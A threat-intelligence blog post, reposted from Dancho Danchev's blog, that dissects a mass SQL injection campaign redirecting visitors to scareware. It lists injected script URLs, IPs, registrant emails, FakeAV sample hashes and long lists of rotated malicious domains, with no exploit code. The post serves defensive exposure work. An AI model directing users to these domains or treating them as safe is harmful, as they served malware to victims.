Breaking News

Dissecting the Massive SQL Injection Attack Serving Scareware


A currently ongoing massive SQL injection attack has affected hundreds of thousands of web pages across the Web, to ultimately monetize the campaign through a scareware affiliate program. Such massive SQL injection attempts are usually conducted using mass vulnerability scanning tools, with the help of search engines which have already crawled the vulnerable sites.

What's particularly interesting about this campaign, is the fact that the used domains are all responding to the same IPs, including the portfolios of scareware domains, which the cybercriminals naturally rotate on a periodic basis. Let's dissect the campaign, expose the domain portfolios and the entire campaign structure.

UPDATED: Related SQL injected URLs courtsesy of WebSense:
online-stats201.info/ur.php - Email: tik0066@gmail.com
stats-master111.info/ur.php - Email: tik0066@gmail.com
agasi-story.info/ur.php - 91.217.162.45 - Email: tik0066@gmail.com
general-st.info/ur.php - Email: tik0066@gmail.com
extra-service.info/ur.php - Email: tik0066@gmail.com
sol-stats.info/ur.php - Email: tik0066@gmail.com
google-stats49.info/ur.php - Email: tik0066@gmail.com
google-stats45.info/ur.php - Email: tik0066@gmail.com
google-stats50.info/ur.php - Email: tik0066@gmail.com
google-server43.info/ur.php - Email: tik0066@gmail.com
stats-master88.info/ur.php - Email: tik0066@gmail.com
eva-marine.info/ur.php - 109.236.81.28 - Email: tik0066@gmail.com
stats-master99.info/ur.php - Email: tik0066@gmail.com
tzv-stats.info/ur.php - Email: tik0066@gmail.com
milapop.com/ur.php - Email: jamesnorthone@hotmailbox.com

SQL injected URLs:
lizamoon.com/ur.php (67,500 results) - 91.220.35.151 (AS3721); 91.213.29.182 (AS51786); 95.64.9.18 (AS50244) - Email: jamesnorthone@hotmailbox.com
alexblane.com/ur.php (3,920 results) - Email: jamesnorthone@hotmailbox.com
alisa-carter.com/ur.php (220,000 results) - Email: jamesnorthone@hotmailbox.com
alexblane.com/ur.php (3,920 results) - Email: jamesnorthone@hotmailbox.com
t6ryt56.info/ur.php (18 results) - Email: support@ruler-domains.com
tadygus.com/ur.php (100 results) - Email: jamesnorthone@hotmailbox.com
worid-of-books.com/ur.php (334,000 results) - Email: tik0066@gmail.com

Upon successful redirection, the campaign attempts to load the scareware domains defender-nibea.in/scan1b/237 - 46.252.130.200 - Email: jimwei2969@gmail.com

Detection rate:
freesystemscan.exe - Trojan/Win32.FakeAV - Result: 9/ 41 (22.0%)
MD5   : 815d77f8fca509dde1abeafabed30b65
SHA1  : 1b3c35afb76c53cd9507fffee46fb58c29e72bc1
SHA256: cd902b92042435c2d70d4bf59acc2de8229bfc367626961f76c03f75dcd7e95c

Responding to 46.252.130.200 (AS25190; KIS-AS UAB "Kauno Interneto Sistemos") are also:
antivirus-1091.co.cc
antivirus-1574.co.cc
antivirus-2051.co.cc
antivirus-2525.co.cc
antivirus-2932.co.cc
antivirus-3654.co.cc
antivirus-3833.co.cc
antivirus-4063.co.cc
antivirus-418.co.cc
antivirus-4303.co.cc
antivirus-4749.co.cc
antivirus-495.co.cc
antivirus-5216.co.cc
antivirus-5676.co.cc
antivirus-5802.co.cc
antivirus-6437.co.cc
antivirus-6703.co.cc
antivirus-7081.co.cc
antivirus-713.co.cc
antivirus-728.co.cc
antivirus-7357.co.cc
antivirus-8072.co.cc
antivirus-9009.co.cc
antivirus-9638.co.cc
antivirus-9667.co.cc
defender-aabv.in - Email: leonflanagan7681@gmail.com
defender-aqeu.co.cc
defender-asng.co.cc
defender-atio.in - Email: terriduverger3239@gmail.com
defender-atxo.in - Email: celineiebba9266@gmail.com
defender-bcvs.in - Email: martinefinklea5375@gmail.com
defender-bwuy.co.cc
defender-cron.in - Email: lisasuresh9147@gmail.com
defender-ddbr.in - Email: selenajohansson9195@gmail.com
defender-dteo.in - Email: giovannaraggio5417@gmail.com
defender-eahy.co.cc
defender-eklq.in - Email: sebastiensheppard8680@gmail.com
defender-endl.in - Email: adamgaylard1113@gmail.com
defender-ewum.co.cc
defender-eyde.co.cc
defender-fmof.in - Email: kamillamartin1237@gmail.com
defender-fola.co.cc
defender-gnva.in - Email: ananddaher7294@gmail.com
defender-grlt.in - Email: anthonygaylard9887@gmail.com
defender-hipw.in - Email: angiejohansen9730@gmail.com
defender-hjlk.in - Email: jennwrayford2124@gmail.com
defender-hmfu.in - Email: lynnbone8026@gmail.com
defender-hsug.in - Email: moniquetkarnopp3596@gmail.com
defender-htlu.in - Email: jerihamann4163@gmail.com
defender-iibk.co.cc
defender-iies.co.cc
defender-iksl.in - Email: amarasanders9974@gmail.com


defender-isde.co.cc
defender-iyrc.co.cc
defender-jgnl.in - Email: caseyalzen3316@gmail.com
defender-jihv.co.cc
defender-keod.in - Email: khashayarbirss4814@gmail.com
defender-kuts.in - Email: rogerfrancis3322@gmail.com
defender-kwwh.in - Email: tobyboisseau6505@gmail.com
defender-kzwu.co.cc
defender-labm.in - Email: gregorybradford1520@gmail.com
defender-lcoh.in - Email: timothythomas6924@gmail.com
defender-nhei.co.cc
defender-nrpr.in - Email: burtonalba8156@gmail.com
defender-ojbr.in - Email: fucknielsen8675@gmail.com
defender-osbi.in - Email: fidelslattum2159@gmail.com
defender-pakc.in - Email: sabrinawheelock7642@gmail.com
defender-ppdw.in - Email: divinakempton5670@gmail.com
defender-qfdx.in - Email: hokyeongyancey6369@gmail.com
defender-qotg.in - Email: franchescaili9704@gmail.com
defender-qpwo.in - Email: carlaadams@gmail.com
defender-qsko.co.cc
defender-qumf.in - Email: carlaadams@gmail.com
defender-rlag.in - Email: carmichaelmail@gmail.com
defender-rrin.in - Email: kevincharoenset5321@gmail.com
defender-thga.in - Email: youngantonio6055@gmail.com
defender-ueuv.co.cc
defender-uqko.in - Email: christinakaaikati5574@gmail.com
defender-vflq.in - Email: terriacuna2081@gmail.com
defender-vlmj.in - Email: lauriefreeman9930@gmail.com
defender-vqqn.in - Email: chrisjames4421@gmail.com
defender-vxgh.in - Email: griseldavelez5369@gmail.com
defender-wkiw.in - Email: otisvaladez7778@gmail.com
defender-wqga.in - Email: christodoulosglidden8856@gmail.com
defender-wrhw.in - Email: bradsuresh1406@gmail.com
defender-wtln.co.cc
defender-xcre.in - Email: pavelmayer4891@gmail.com
defender-xnnx.in - Email: pavelmayer4891@gmail.com
defender-ykym.co.cc
movie-iirg.in - Email: misslynn8546@gmail.com
movie-pblv.in - Email: judgewright4021@gmail.com
movies-live-tube-jeyq.co.cc
movie-tkhk.in - Email: terrymeally1288@gmail.com
movie-tube-beym.co.cc
movie-tube-juie.co.cc

movie-ueep.in - Email: celinekevin6179@gmail.com
movieway2011.com - Email: contact@privacyprotect.org
movie-xbtb.in - Email: sanfordross9242@gmail.com
movie-xxnl.in - Email: ianbalitsaris3201@gmail.com
softway2011.com - Email: contact@privacyprotect.org
system-scanner-boep.co.cc
system-scanner-eill.co.cc
system-scanner-eopa.co.cc
system-scanner-ewqq.co.cc
system-scanner-iaap.co.cc
system-scanner-ieyx.co.cc
system-scanner-lcyo.co.cc
system-scanner-ouny.co.cc
system-scanner-oypx.co.cc
system-scanner-qeap.co.cc
system-scanner-racv.co.cc
system-scanner-ryes.co.cc
system-scanner-tzii.co.cc
system-scanner-uemo.co.cc
system-scanner-uotu.co.cc
system-scanner-uyxt.co.cc
system-scanner-vpoo.co.cc
system-scanner-xtoi.co.cc
system-scanner-yoyx.co.cc
system-scanner-ytut.co.cc


Rotated scareware domains involved in the campaign, responding to 84.123.115.228 (AS6739; ONO-AS Cableuropa - ONO):
defender-thga.in - Email: youngantonio6055@gmail.com
defender-wqga.in - Email: christodoulosglidden8856@gmail.com
defender-gnva.in - Email: ananddaher7294@gmail.com
defender-rlob.in - Email: vasikaranfreudenburg2690@gmail.com
defender-abcc.in - Email: rubysmart5057@gmail.com
defender-pakc.in - Email: sabrinawheelock7642@gmail.com
defender-keod.in - Email: khashayarbirss4814@gmail.com
defender-xcre.in - Email: pavelmayer4891@gmail.com
defender-qumf.in - Email: rachelalba1891@gmail.com
defender-fmof.in - Email: kamillamartin1237@gmail.com
defender-uvag.in - Email: espenkeck7682@gmail.com
defender-hsug.in - Email: moniquetkarnopp3596@gmail.com
defender-vxgh.in - Email: griseldavelez5369@gmail.com
defender-lcoh.in - Email: timothythomas6924@gmail.com
defender-kwwh.in - Email: tobyboisseau6505@gmail.com
defender-osbi.in - Email: fidelslattum2159@gmail.com
defender-wbui.in - Email: carlosbuntschu1238@gmail.com
defender-vlmj.in - Email: lauriefreeman9930@gmail.com
defender-hjlk.in - Email: lauriefreeman9930@gmail.com
defender-endl.in - Email: adamgaylard1113@gmail.com
defender-jgnl.in - Email: caseyalzen3316@gmail.com
defender-iksl.in - Email: marasanders9974@gmail.com
defender-labm.in - Email: gregorybradford1520@gmail.com
defender-rrin.in - Email: kevincharoenset5321@gmail.com
defender-sxin.in - Email: taloupavlinovich7166@gmail.com
defender-cron.in - Email: lisasuresh9147@gmail.com
defender-vqqn.in - Email: chrisjames4421@gmail.com
defender-dteo.in - Email: giovannaraggio5417@gmail.com
defender-uqko.in - Email: christinakaaikati5574@gmail.com
defender-qpwo.in - Email: carlaadams@gmail.com
defender-atxo.in - Email: celineiebba9266@gmail.com
defender-rlfp.in - Email: latanyamuscatell9507@gmail.com
defender-vflq.in - Email: terriacuna2081@gmail.com
defender-eklq.in - Email: sebastiensheppard8680@gmail.com
defender-ddbr.in - Email: selenajohansson9195@gmail.com
defender-ojbr.in - Email: fucknielsen8675@gmail.com
defender-drnr.in - Email: sumanvcasquez2008@gmail.com
defender-nrpr.in - Email: burtonalba8156@gmail.com
defender-kuts.in - Email: rogerfrancis3322@gmail.com
defender-bcvs.in - Email: martinefinklea5375@gmail.com
defender-grlt.in - Email: anthonygaylard9887@gmail.com
defender-hmfu.in - Email: lynnbone8026@gmail.com
defender-htlu.in - Email: jerihamann4163@gmail.com
defender-aabv.in - Email: leonflanagan7681@gmail.com
defender-ppdw.in - Email: divinakempton5670@gmail.com
defender-wrhw.in - Email: bradsuresh1406@gmail.com
defender-wkiw.in - Email: otisvaladez7778@gmail.com
defender-hipw.in - Email: angiejohansen9730@gmail.com
defender-qfdx.in - Email: hokyeongyancey6369@gmail.com
defender-xnnx.in - Email: sylviawulff2140@gmail.com
defender-xkox.in - Email: ryanmartin7607@gmail.com

The scareware domains have been registered using automatically registered email accounts at Gmail, as a precaution in an attempt to make it harder to expose the campaign by using a single email only.

Monitoring of the campaign is ongoing.

Related posts:
This post has been reproduced from Dancho Danchev's blog.
Share:

Featured Security Image

Featured Security Image
The Heart of KOOBFACE. C&C and Social Network Propagation

Featured Cyber Intelligence Service

Featured Cyber Intelligence Service
DDanchev is for Hire!

Featured Cyber Intelligence Project

Featured Cyber Intelligence Project
Project Proposal - Cybercrime Research - Seeking Investment

Featured Threat Intelligence Project

Featured Threat Intelligence Project
Dancho Danchev's Mind Streams of Information Security Knowledge - The World's Most Comprehensive Threats Database

Featured Threat Intelligence Consultancy

Featured Threat Intelligence Consultancy
Threat Intelligence - An Adaptive Approach to Information Security - Free Consultation Available

Featured Hacking Project

Featured Hacking Project
Book Proposal - Seeking Sponsorship - Publisher Contact

Popular Posts

Featured Security Tool

Featured Security Tool
ConfidantMail

Featured Video

Featured Privacy Service

Featured Privacy Service
Pi-hole Privacy Blocking

Featured Video

Recent Posts

Featured Service

Featured Service
SurfWatch Threat Analyst

Featured Video